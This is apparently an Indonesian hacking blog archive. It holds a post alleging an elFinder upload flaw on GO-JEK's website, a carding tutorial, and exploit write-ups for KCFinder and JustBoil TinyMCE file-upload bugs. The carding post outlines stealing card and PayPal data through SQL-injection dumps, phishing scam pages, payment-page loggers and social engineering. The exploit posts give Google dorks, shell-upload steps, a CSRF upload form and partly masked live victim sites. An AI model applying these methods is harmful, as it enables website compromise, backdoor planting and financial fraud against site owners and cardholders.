Tampilkan postingan dengan label Unrestricted. Tampilkan semua postingan
Tampilkan postingan dengan label Unrestricted. Tampilkan semua postingan

Minggu, 17 Juli 2016

Bug Pada Website GO-JEK Indonesia


Bug Pada Website GO-JEK Indonesia - Go-Jek merupakan sebuah startup yang menggunakan teknologi sebagai modal utama untuk menjalankan bisnisnya. Kami rasa Go-jek sendiri pasti mempunyai banyak sekali team didalamnya, seperti team developer, design, marketing dan lain lain. dan kami yakin pastinya gojek juga mempunyai team security untuk menjaga keamanan teknologi yang dipakainya.

Memang Go-jek tidak sepenuhnya menggunakan websitenya untuk menjalankan kegiatanya. Gojek hanya menggunakan aplikasi pada android / ios / os lainnya. Tetapi tidak menutup kemungkinan apakah website gojek dibiarkan begitu saja ? Menurut kami website juga sangat penting walaupun tidak banyak digunakan tetapi paling tidak dijaga keamanannya untuk mengindari sesuatu yang fatal. 

Ternyata website gojek mempunyai bug lohh.. 
mau tau ? Simak berikut ini 

Bug Website GoJek

#- Title: Bug Website GoJek 
#- Author: Tidak dipastikan
#- Published : 7-17-2016
#- Developer : Team Go-Jek
#- Fixed in Version : -
#- Tested on : windows
========================================================================
Proof Of Concept 


Vulnerability :
site.com/path/elfinder

Vuln Extension :
.php .php3 .php6 .txt .html .pl .htaccess .html .phtml .jpg .gif and anymore

Jenis Kerusakan : 
Lumayan Tinggi ( Tergantung Webnya )

Metode Penyerangan :
Attacker dapat menyerang celah ini dengan mengupload backdoor dengan berbagai extension

Deskripsi :

Go-jek mempunyai bug kemanan pada websitenya. bug tersebut adalah bug yang sudah banyak digunakan oleh beberapa website didunia. Jadi kami tidak kaget lagi tentang bug itu. Bug itu adalah : elFinder 2.0 - file manager for web(rc1) - File Upload Vulnerability
Bug ini sudah lama ditemukan sekitar 2 tahun yang lalu. 




Nampaknya go-jek sudah mengantisipasi hal berikut. Elfinder yang terdapat gojek ini sudah ditata sedimikian rupa sehingga para attacker hanya bisa mengupload beberapa file tetapi tidak bisa dapat mengeksekusi. 

Tetapi tidak menutup kemungkinan mungkin ada attacker yang lebih lihai lagi. Bisa saja elfindernya dibypass kemudian attacker tersebut dapat masuk kedalam public html. Tentu hal ini bisa berakibat fatal bagi Go-jek

Reference :  0day .today/exploit/22381

Solve
Patching




 ( Pic )



Jumat, 27 Mei 2016

Method Carding CC/PP Yang Banyak DiGunakan


Jenis Method Carding Yang Banyak DiGunakan - Carding sebuah fenomena pada zaman modern ini yang terus berjalan. Banyak banget yang ingin belajar carding melalui blog blog atau website tutorial yang ada di Google. Mereka semua ingin sekali melakukan carding dengan cara instan. dalam carding tidak ada yang namanya Jalan instan semua harus melewati tahap tahap.  
orang yang baru pertama kali ingin melakukan carding pasti mereka ingin juga langsung mendapatkan hasil pada saat itu juga Saya yakin hasil pasti tidak akan maksimal. Untuk memulai carding kita harus mengetahui garis besar metode yang digunakan dalam carding berikut metode carding.

1. Dumping


Dumping atau sering disebut ngedump. Ngedump salah satu metode dalam carding. Dilihat dari namanya Dump yang artinya mengeluarkan, mengeluarkan disini artinya adalah mengeluarkan seluruh isi data base sebuah web. Mengeluarkan seluruh isi data base tidak serta merta langsung merusak data base. Karena di tool yang kita gunakan, tool tersebut hanya menampilkan data yang ada dalam database tersebut. Ok, apa sih yang kita cari dalam DB tersebut ? Yang kita cari pastinya adalah data cc nya. Tapi kalo ada user & password admin, kalian juga bisa login kedalam web tersebut lalu terserah yang mau kalian apakan.

Alat :
Haavij


Method :
Teknik SQL Injection

Baca Juga : Tutorial deface dengan SQLMAP Lengkap + Gambar

Kelebihan :
Kelebihan dari dumping adalah kita bisa mengambil semua isi dari database web victim. Contoh : Email, user ,password admin, atau data yang lainnya.

Kekurangan:
Memakan cukup waktu yang lama, karena kita scanning 1 persatu web.


2. Spamming

Spamming atau sering disebut dengan spam. Teknik ini adalah teknik yang banyak sering digunakan pada saat ini karena teknik jumping Menurut Yang lain itu lebih susah dan memakan banyak waktu yang banyak. Spamming maksudnya adalah kita men spam email orang lain tersebut berisikan sebuah letter yang mengajak orang tersebut agar login ke web scampage kita. Tetapi sebelum spamming pastinya kita akan membutuhkan email email.  makanya kita membutuhkan sebuah web yang di data base nya terdapat banyak email, email tersebut bisa kita ekstrak dan bisa di spamming.

Jika victim tertarik dengan letter kita di email, dan vic login ke dalam scampage maka nanti akan muncul result data yang langsung dikirim ke email kita.


Alat :
1. Domain
2. Hosting
3. Script scampage
4. Letter
5. SMTP
6. Mailer
7. Mailist

Kelebihan :
  • Jika semua sudah terpenuhi kita hanya duduk manis dan nunggu result datang ke email kita.
  • Tidak memakan banyak waktu lama
  • Tidak usah capek capek, capek nyari alat tempurnya doang.

kekurangan :
Susah untuk mendapatkan senjata tempurnya, kalo mau gampang harus modal dulu beli alat tempur diatas. Sebenernya ada jalan untuk mempermudah Spamming yaitu kamu harus belajar deface terlebih dahulu.


3. Logger

Logger adalah teknik merekam data. Jadi jika ada sebuah web shop yang menyediakan payment dengan menggunakan cc / pp. Disitu kita bisa menambahkan sebuah script logger, Script tersebut akan merekam data cc / pp yang masuk. Tentunya untuk dapat ngelog sebuah web shop kita harus menembus securitynya terlebih dahulu dengan 3xploi7 / teknik deface laiinnya.

Contoh dari logger ini adalah di exploit magento Add Admin. Di salah satu exploit ini kita bisa menambahkan script logger. di permudah dengan status kita sebagai "Admin Setan".

Alat :

  • Teknik Deface
  • Script Logger
Kelebihan :
Jika logger sudah terpasang kita hanya tinggal duduk manis saja. Nanti result akan datang sendiri.

kekurangan :
Kita harus mencari terlebih dahulu di mana letak anu anu paymentnya, jika ketemu baru bisa dipasang logger disana.

Jika admin web tersebut mengetahui logger kita, maka langsung di copot wkwkw



 

3. Soceng

Soceng atau social engineering. Metode ini merupakan metode tipu daya manusia saja, yaitu membodohi orang lain. Seperti kita memberitahu kalo kamu salah memasukan "ini" di akun paypal kamu, sini aku benerin. Jika berhasil dia akan memberi data paypalnya. dan kita bisa mengutik utik deh itunya. Metode ini sering di gunakan oleh ripper bangs*at. Maka dari itu kita harus pinter milih partner


Alat :
Akun kloningan, kejelian, membuat godaan yang kuat etc

Kelebihan :
gak ada sih keknya

kekurangan :

Resiko sangat besar, karena kita berhadapan langsung dengan orang tersebut.

4. Malak

Buka fesbuk, liat mastah terus chat dia : " Mastah bagi cc dong" / " mastah ajarin carding dong "
 Itu juga kalo di read sama mastah wkwkw .
Tipe ini biasanya di gunakan oleh banyak bocah kampret.


Sekian Jenis Method Carding Yang Banyak DiGunakan, secara garis besarnya. semoga bisa nambah informasi kalian semua. Jangan lupa share blog ini & klik suka fanpage 3xploi7 BuG.


*Penting : Baca +650 Dork Carding CC/Paypal [ Fresh ]

Sabtu, 31 Oktober 2015

KCFinder Upload Shell Vulnerability



#-  Exploit Title : KCFinder Upload Shell Vulnerability
#- Exploit Author : Iranian_Dark_Coders_Team
#- Google Dork : inurl:/kcfinder/browse.php
#- Date : 24/04/2014
#- Home : www.idc-team. net
#- Discovered By : Black.Hack3r
#- Vendor Homepage : kcfinder.sunhater. com
#- Version : 2.51 - 2.53
#- Tested on : Windows 8 & Linux

=================================================

 [+] Events location bug:

 [+] http://127.0.0.1/path/kcfinder/config.php

  Line 51: 'deniedExts' => "exe com msi bat php phps phtml php3 php4 cgi pl",



 [+] Exploit:
 
 [+] http://
127.0.0.1/kcfinder/browse.php
 [+] http://
127.0.0.1/[path]/kcfinder/browse.php



 [+] Proof Of Cencept

Trick 1 ~~
 
1 > Go to target link
    http://
localhost/KCFinder/browse.php

2 > Then select your folder from the left panel

3 > Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & defacepage.html ]

4 > Shell Acces ?
      {here}
       

Trick 2 ~~

Where is vulnerability ? "localhost/path/kcfinder/upload.php"

How to ??  You can use CSRF :) 

<form method="POST" action="http://web. com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ ndsxf</button>
</form> 

Shell Acces ? {here}

 [+] Demo site:

 [+] http://www.basukiwat**.com/assets/js/mylibs/kcfinder/browse.php
 [+] http://www.padel4**.be/kcfinder/browse.php
 [+] http://goyathlaysvintagepavonirestoratio**.com/kcfinder/browse.php



 [+] Discovered By : Black.Hack3r
 [+] We Are : M.R.S.CO,Black.Hack3r,N3O,D$@d_M@n,KurD_HaCK3R,HOt0N
 [+] SpTnx  : Sec4ever,HashoR,@3is,Security,M4H4N,Mr.Cicili And All IDC Member
 [+] Home : www.idc-team. net




Exploit JustBoil TinyMCE Images Upload Unrestricted #issue


#-Title: Exploit JustBoil TinyMCE Images Upload Unrestricted #issue
#-Author: Goginho
#-Date: 10/31/2015
#- Vendor : justboil
#- Link Download : github. com/vikdiesel/justboil. me
#- Tested on : Trusty Tahr / ubuntu
#- Fixed in ??
==========================================================================

Proof Of Concept :

[#] Google Dork: 
intext:"{#jbimages_dlg.select_an_image}"
inurl:"/plugins/jbimages/"

[#] Vulnerability / Exploit : "/public/js/tiny_mce/plugins/jbimages/dialog.htm"

[#] When Vulnerable :



This is just issue, problably u can exploited this plugin.

Shell Acces ? hmm ..